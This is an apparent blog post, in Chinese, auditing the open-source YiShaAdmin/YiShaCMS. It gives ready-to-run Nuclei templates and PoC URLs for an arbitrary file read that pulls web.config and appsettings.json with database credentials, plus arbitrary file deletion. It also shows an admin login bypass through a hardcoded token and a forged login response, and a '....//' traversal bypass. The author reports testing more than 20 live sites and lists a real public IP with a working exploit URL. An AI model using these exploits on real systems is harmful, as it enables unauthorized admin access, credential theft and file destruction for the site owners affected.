YiShaCMS 代码审计记录
2022-10-13 12:18:55 Author: 1oecho.github.io(查看原文) 阅读量:356 收藏

0x01 开源地址:

https://github.com/liukuo362573/YiShaAdmin

总计star超过1.7k

系统占比:

POC:

漏洞1: 任意文件读取:

● LFI

id: YiShaCMS_LFI

info:
name: YiShaCMS_LFI
author: loecho
severity: medium
description: description
reference: https://1oecho.github.io
tags: lfi

requests:

  • raw:

    • |+
      GET /File/DownloadFile?filePath=web.config&delete=0 HTTP/1.1
      Host: {{Hostname}}
      Accept: /
      DNT: 1
      X-Requested-With: XMLHttpRequest
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
      Accept-Encoding: gzip, deflate
      Accept-Language: zh-CN,zh;q=0.9
      Connection: close

    matchers-condition: and
    matchers:

    • type: word
      part: header
      words:
      • 'Content-Disposition: attachment; filename='
    • type: status
      status:
      • 200

漏洞二:登陆绕过

● Login_Bypass:

id: YiShaCMS_Login

info:
name: YiShaCMS_LoginBypass
author: loecho-sec
severity: high
description: description
reference: https://1oecho.github.io
tags: high

requests:

  • raw:

    • |+
      GET /admin/Home HTTP/1.1
      Host: {{Hostname}}
      Cache-Control: max-age=0
      Upgrade-Insecure-Requests: 1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3
      Accept-Encoding: gzip, deflate
      Accept-Language: zh-CN,zh;q=0.9
      Cookie: userToken=265d8570ac504b588c85018c7974a431
      Connection: close

    matchers-condition: and
    matchers:

    • type: word
      part: header
      words:
      • HTTP/1.1 200 OK
      • /admin/Home/Skin
      • /admin/OrganizationManage/User/ChangePassword
    • type: status
      status:
      • 200

github地址:

https://github.com/liukuo362573/YiShaAdmin
官网-CMS演示站:

登陆绕过,批量测试:测试20+站点,都存在

任意文件读取批量测试:测试20+站点,都存在

http://106.14.124.170/File/DownloadFile?filePath=appsettings.json&delete=0

● 任意文件读取漏洞/任意文件删除漏洞/管理员登陆绕过漏洞

逻辑漏洞-管理员未授权登录:

● 代码权限校验问题,token为固定Token

返回包:

Set-Cookie: UserToken=265d8570ac504b588c85018c7974a431;

{"Tag":1,"Success":false,"Message":"登录成功","Code":0,"Description":null,"addition":null}

  1. admin账号登录,密码随意
  2. 抓取登录返回包,修改返回包
  3. 成功登录为管理员用户

任意文件删除:

POC:

http://localhost:5000/File/DownloadFile?filePath=test.txt&delete=1

任意文件读取:

POC (获取数据库连接文件)

http://localhost:5000/File/DownloadFile?filePath=appsettings.json&delete=0

高版本跨目录绕过:

....//


文章来源: https://1oecho.github.io/-VyrZHfdM/
如有侵权请联系:admin#unsafe.sh